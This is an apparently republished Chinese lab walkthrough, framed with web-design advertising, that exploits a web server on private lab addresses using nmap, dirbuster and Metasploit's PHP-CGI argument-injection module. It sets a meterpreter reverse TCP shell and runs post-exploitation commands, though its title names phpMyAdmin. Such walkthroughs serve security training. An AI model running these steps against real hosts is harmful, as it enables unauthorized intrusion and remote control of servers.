Metasploit溢出phpMyAdmin漏洞

    利用phpMyAdmin漏洞上傳***程序,獲得webshell。

為山亭等地區(qū)用戶提供了全套網(wǎng)頁(yè)設(shè)計(jì)制作服務(wù),及山亭網(wǎng)站建設(shè)行業(yè)解決方案。主營(yíng)業(yè)務(wù)為做網(wǎng)站、成都做網(wǎng)站、山亭網(wǎng)站設(shè)計(jì),以傳統(tǒng)方式定制建設(shè)網(wǎng)站,并提供域名空間備案等一條龍服務(wù),秉承以專業(yè)、用心的態(tài)度為用戶提供真誠(chéng)的服務(wù)。我們深信只要達(dá)到每一位用戶的要求,就會(huì)得到認(rèn)可,從而選擇與我們長(zhǎng)期合作。這樣,我們也可以走得更遠(yuǎn)!

    CGI腳本沒有正確處理請(qǐng)求參數(shù),導(dǎo)致源代碼泄露,允許遠(yuǎn)程***者在請(qǐng)求參數(shù)中插入執(zhí)行命令。

一、利用nmap工具掃描目標(biāo)主機(jī)

1.1使用nmap命令對(duì)目標(biāo)主機(jī)進(jìn)行掃描。單擊桌面空白處,右鍵菜單選擇“在終端中打開”。

1.2在終端中輸入命令“nmap –sV  192.168.1.3”,對(duì)目標(biāo)主機(jī)進(jìn)行端口掃描,發(fā)現(xiàn)開放80端口。

Metasploit溢出phpMyAdmin漏洞

1.3在瀏覽器地址欄中輸入“http:\\192.168.1.3”,訪問(wèn)目標(biāo)網(wǎng)站。

二、利用dirbuster掃描目標(biāo)主機(jī)

2.1在終端中輸入命令“dirbuster”,啟動(dòng)軟件對(duì)目標(biāo)網(wǎng)站進(jìn)行掃描。

2.2在Target URL處輸入“192.168.1.3”,在File with list of dirs./file處選擇字典文件(/usr/share/dirbuster/wordlists/目錄下),單擊“Start”按鈕,開始掃描。

Metasploit溢出phpMyAdmin漏洞

2.3掃描結(jié)果顯示包含cgi-bin目錄、phpmyadmin目錄等。

Metasploit溢出phpMyAdmin漏洞

三、利用metasploit***目標(biāo)主機(jī)

3.1在終端中輸入命令“msfconsole”,啟動(dòng)MSF終端。

3.2在終端中輸入命令“search php_cgi”,搜索php_cgi的相關(guān)工具和***載荷。

3.3在終端中輸入命令“use exploit/multi/http/php_cgi_arg_injection”,啟用漏洞利用模塊, 提示符就會(huì)提示進(jìn)入到該路徑下。

Metasploit溢出phpMyAdmin漏洞

3.4在終端中輸入命令“show payloads”,顯示Metasploit中可以在遠(yuǎn)程主機(jī)執(zhí)行的代碼,即shellcode。

3.5在終端中輸入命令“set PAYLOAD php/meterpreter/reverse_tcp”,設(shè)置使用的shellcode代碼。

3.6在終端中輸入“show options”,顯示***模塊需要設(shè)置的參數(shù)。

3.7在終端中輸入“set LHOST 192.168.1.2”,設(shè)置源主機(jī)的IP地址,用于會(huì)話的反向鏈接。

3.8在終端中輸入“set RHOST 192.168.1.3”,設(shè)置目標(biāo)主機(jī)的IP。

Metasploit溢出phpMyAdmin漏洞

Metasploit溢出phpMyAdmin漏洞

3.9在終端中輸入“exploit”,開始對(duì)目標(biāo)主機(jī)進(jìn)行***。

Metasploit溢出phpMyAdmin漏洞

3.10在終端中輸入“sysinfo”,查看系統(tǒng)環(huán)境信息。

3.11在終端中輸入“l(fā)s”,顯示當(dāng)前目錄下的文件內(nèi)容。

Metasploit溢出phpMyAdmin漏洞

3.12在終端中輸入“cat phpinfo.php”,查看文件內(nèi)容。

Metasploit溢出phpMyAdmin漏洞

文章名稱:Metasploit溢出phpMyAdmin漏洞
文章地址:http://bm7419.com/article44/igsohe.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供全網(wǎng)營(yíng)銷推廣、建站公司微信公眾號(hào)、定制開發(fā)網(wǎng)站導(dǎo)航、網(wǎng)站制作

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

h5響應(yīng)式網(wǎng)站建設(shè)